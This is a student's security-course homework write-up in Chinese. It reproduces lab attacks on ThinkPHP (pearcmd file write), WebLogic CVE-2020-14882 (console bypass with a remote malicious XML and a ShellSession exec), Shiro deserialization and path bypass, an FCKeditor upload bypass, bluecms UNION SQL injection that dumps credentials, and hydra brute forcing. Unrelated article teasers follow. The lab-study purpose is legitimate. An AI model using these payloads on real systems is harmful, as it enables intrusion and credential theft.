第十一次作业

news/2024/11/14 21:32:34/文章来源:https://www.cnblogs.com/jiajiawei/p/18543738

1、RCE:分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程>
ThinkPHP:
环境搭建

前端测试是否存在pearcmd,访问路径,存在的话报错就确认存在

在根目录下创建magedu3.php这个文件,文件内容为<?=phpinfo()?>,10.0.0.150:8080/public/?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<? =phpinfo()?>+/var/www/html/magedu3.php

写入成功后,直接访问php文件,成功解析

Weblogic:
启动Weblogic漏洞(CVE-2020-14882)环境

启动完成后,访问 http://10.0.0.150:7001/console 可查看到后台登录页面

这里利用CVE-2020-14882漏洞,访问以下URL,可未授权访问到管理后台页面

方式一:
构造一个恶意的XML文件,并将其保存在Weblogic可以访问到的服务器上(dvwa靶场)

访问http://10.0.0.150:7001/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.su pport.FileSystemXmlApplicationContext("http://10.0.0.150:8080/hackable/uploads/rce.xml"),即可让Weblogic加载该恶意XML文件,并执行其中的命令

进入容器,可以发现 touch /tmp/magedu1 已成功执行

方式二:
直接访问http://10.0.0.150:7001/console/images/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java .lang.Runtime.getRuntime().exec('touch%20/tmp/magedu2');")

进入容器,可以发现 touch /tmp/magedu2 已成功执行

Shiro:
Shiro反序列化漏洞(CVE-2016-4437):
启动环境

工具一:ShiroExploit.V2.51


目标站点存在漏洞,Shiro的默认密钥、利用链等都被显示出来

检测到漏洞以后,就可以在输入框输入命令,实现RCE

工具二:shiro_attack_2.2
使用 shiro_attack2.2 爆破Shiro密钥检测漏洞

实现远程命令执行

实现内存马:

打开冰蝎


通过内存马getshell

Shiro权限绕过漏洞(CVE-2020-1957):
环境搭建

直接请求管理页面 /admin/,无法访问,将会被重定向到登录页面。构造恶意请求 /xxx/..;/admin/,即可绕过权限校验,访问到管理页面

2、FCKeditor编辑器漏洞实验;
首先搭建环境:Windows10+phpstudy_64(php 5.4.45)

根目录放入源码

搭建好环境后开始挖掘:

目录扫描发现目标网站存在FCKeditor
查看版本,判断出该FCKeditor编辑器版本为:2.4.3

利用示例页面进行上传,点击插入/编辑图像,点击链接,Browse Server

会出现FCK上传页面

访问链接http://192.168.2.115/fckeditor/editor/filemanager/browser/default/browser.html? Connector=connectors/php/connector.php 发现存在报错

访问C:\phpstudy_pro\WWW\FCKeditor\editor\filemanager\browser\default\connectors\php\config.php,修改配置如下并保存:
上传路径:C:\phpstudy_pro\WWW\FCKeditor\editor\filemanager\browser\default\images

再次访问链接,可以正常访问

上传PHP文件,抓包,修改php后缀,增加空格

上传成功

根据前面的配置文件可以构造出路径:http://192.168.2.115/FCKeditor\editor\filemanager\browser\default\images\file/info.php

3、bluecms旁注漏洞,并解释为什么旁站攻击可以拿下主站?跨库的意思是什么?
搭建环境:
将bluecms源码放入phpstudy网站目录中

之后访问 bluecms/uploads/install/ 进行安装


返回空白安装成功

开始攻击:
访问http://192.168.2.115/bluecms/uploads/可以看到登录主页面

通过猜测发现旁站后台,访问http://192.168.2.115/bluecms/uploads/admin使用账号密码(admin/123456)进行登录,获取旁站后台管理员权限


添加广告后,发现“获取JS”的功能


对该功能点进行注入测试

通过order by来判断sql语句查了多少列,order by 8报错,证明sql语句查了7列


注入出数据库名为bluecms

注入出数据用户名为root@localhost

注入出当前库所有的表名view-source:http://192.168.2.115/bluecms/uploads/ad_js.php?ad_id=-1 union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()

继续注入blue_user表中的字段名,发现报错,存在过滤,单引号前面出现 \ 证明单引号被转义,使用16进制进行绕过
view-source:http://192.168.2.115/bluecms/uploads/ad_js.php?ad_id=-1 union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f75736572

继续注入bluecms库中blue_user表的user_name和pwd字段内容
view-source:http://192.168.2.115/bluecms/uploads/ad_js.php?ad_id=-1 union select 1,2,3,4,5,6,concat(user_name,pwd) from blue_user

解码密码为123456

旁站与跨库:
在同一服务器中有A,B两个站点。A为主站比较难打,就可以通过信息收集拿到站点B,站点B的防护没有站点A的安全,此时就可以攻打旁站B,从而拿下站点B的数据库,
利用SQL注入漏洞拿下整个服务器,自然也就拿下了主站A。跨库的意思就是通过拿下了站点B的数据库以后,以数据库B为跳板去查询数据库A的内容。

4、暴力猜解:hydra实现对ftp、ssh、rdp、mysql的暴力破解。
ftp:
设置账号为 ftp/666 并启动ftp服务

使用hydra暴力破解ftp服务

利用该密码成功登录ftp服务器 ftp://192.168.2.115/


ssh:
使用hydra暴力破解ssh服务,首先在Windows系统中安装openssh

安装完成后,看到C盘目录下已经存在OpenSSH文件夹,接下来配置环境变量

配置完成后,在命令行输入ssh,出现下图即安装成功

默认安装openssh,账号密码默认是当前系统用户的微软账号和密码
(微软账号没有设置密码)所以没有爆出

rdp:
使用hydra暴力破解rdp服务,虚拟机win10开启远程桌面

因为微软账号没有设置密码,所以没有爆出

mysql:
使用hydra暴力破解Mysql服务,win10系统中启动MySQL服务,查看账号密码


安装数据库管理工具


设置MySQL允许远程连接:选中grant all privileges on *.* to root@'%' identified by 'root';语句,点击右键选择运行

破解出192.168.2.115的mysql的账号密码为:root/root

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/833640.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python并行编程1并行编程简介(上)高频面试题:GIL进程线程协程

1 并行编程简介 首先,我们将讨论允许在新计算机上并行执行的硬件组件,如 CPU 和内核,然后讨论操作系统中真正推动并行的实体:进程和线程。随后,将详细说明并行编程模型,介绍并发性、同步性和异步性等基本概念。 介绍完这些一般概念后,我们将讨论全局解释器锁(GIL)及其…

鸿蒙NEXT开发案例:年龄计算

​ 【引言】 本案例的目标是开发一款年龄计算器应用,该应用能够根据用户输入的出生日期,计算出用户的实际年龄、虚岁、星座、生肖等信息。同时,应用还将提供距离下次公历和农历生日的天数及星期等信息。为了实现这些功能,我们将使用ArkTS和ArkUI作为开发语言,并借助@nutpi…

Dosbox-x安装WinXP——图文教程

很多老游戏只能在win95、98或者XP中运行,因此,很多人尝试将Win95、98安装到Dosbox中,利用Dosbox来玩那些久远的情怀。有Win98自然就有人想在Dosbox中安装更高级的Win系统,于是就有人尝试在Dosnox中安装Win2000、WinXP的,其中2023-07-03在国外的fabulous.systems出现了一篇…

ABB AC900F学习笔记331:使用ST做自定义功能块,计算最近60秒的分钟均值和最近60分钟的小时均值

前面自己学习了在西门子TIA使用SCL编程,施耐德Unity中使用ST编程做分钟均值和小时均值的方法,今晚在家练习了在ABB Freelance中自定义功能块使用ST语言做分钟均值和小时均值。 新建项目、插入硬件、仿真器、操作站等不做介绍。新建一个用户功能块池,下面建一个功能块类。功能…

DBeaver如何设置自动刷新数据库表的数据,彻底解放双手!

前言 大家好,我是小徐啊。 DBeaver是一款常用的数据库连接工具,它的优点是免费使用,而且支持的数据库类型超级多,甚至可以直接安装数据库对应的驱动jar包来连接数据库。 比如达梦数据库,之前版本是可以通过jar包方式设置驱动来连接达梦数据库的。好了,言归正传,今天小徐…

Intellij IDEA如何设置中文版?安装中文汉化包插件?失败问题解决!

前言 大家好,我是小徐啊。 Intellij IDEA默认是英文的操作界面,因为是外国人开发的嘛~对于英文好一点的同学来说,英文就英文吧,但对于英文比较差的同学,就还是希望能够汉化一下,变成熟悉的中文。今天小徐就来介绍下如何在IDEA中安装汉化插件,以及在这过程中,我遇到的奇…

TCP_UDP

TCP, UDP Flood 攻击原理TCP Flood攻击配置环境Windows Server 2016配置服务器管理器,创建一个Web服务器并开启该服务器功能kali配置 vim /etc/network/interfacesifup eth0 开启网络 查看Kali ip 信息:修改路由器信息: 拓扑关系如下所示:GNS 3 中修改路由器 R1:GNS3 中修改…

Python用CEEMDAN-LSTM-VMD金融股价数据预测及SVR、AR、HAR对比可视化

全文链接:https://tecdat.cn/?p=38224 原文出处:拓端数据部落公众号分析师:Duqiao Han股票市场是一个复杂的非线性系统,股价受到许多经济和社会因素的影响。因此,传统的线性或近线性预测模型很难有效、准确地预测股票指数的价格趋势。众所周知,深度学习通过逐层特征转换…

java 反序列化 cc4 复现

java 反序列化 cc4 复现复现环境:jdk<=8u65,commonsCollections=4.0 CommonsCollections4.x版本移除了InvokerTransformer类不再继承Serializable,导致无法序列化.但是提供了TransformingComparator为CommonsCollections3.x所没有的,又带来了新的反序列化危险. cc4的执行命令…

ICMP 重定向攻击

ICMP 重定向攻击原理 ICMP (Internet Control Message Protocol) :Internet 控制报文协议,用于在 IP 主机和 路由器之间传递控制消息(控制消息指网络是否通、主机是否可达、路由器是否可用等)ICMP 重定向 在某些特定情况下,路由器在检测到主机使用非优化路由时,会向主机发送…

java 反序列化 cc3 复现

java 反序列化 cc3 复现版本要求:jdk版本<=8u65,common-collections版本<=3.2.1 在很多时候,Runtime会被黑名单禁用.在这些情况下,我们需要去构造自定义的类加载器来加载自定义的字节码. 类加载机制 双亲委派 这里直接粘别人的了.实现一个自定义类加载器需要继承 ClassLo…

使用Tailwind CSS的几个小Tips

前情 Tailwind CSS 是一个原子类 CSS 框架,它将基础的 CSS 全部拆分为原子级别。它的工作原理是扫描所有 HTML 文件、JavaScript 文件以及任何模板中的 CSS 类名,然后生成相应的样式代码并写入到一个静态 CSS 文件中。Tailwind CSS 快速、灵活、可靠、没有运行时负担。自从接…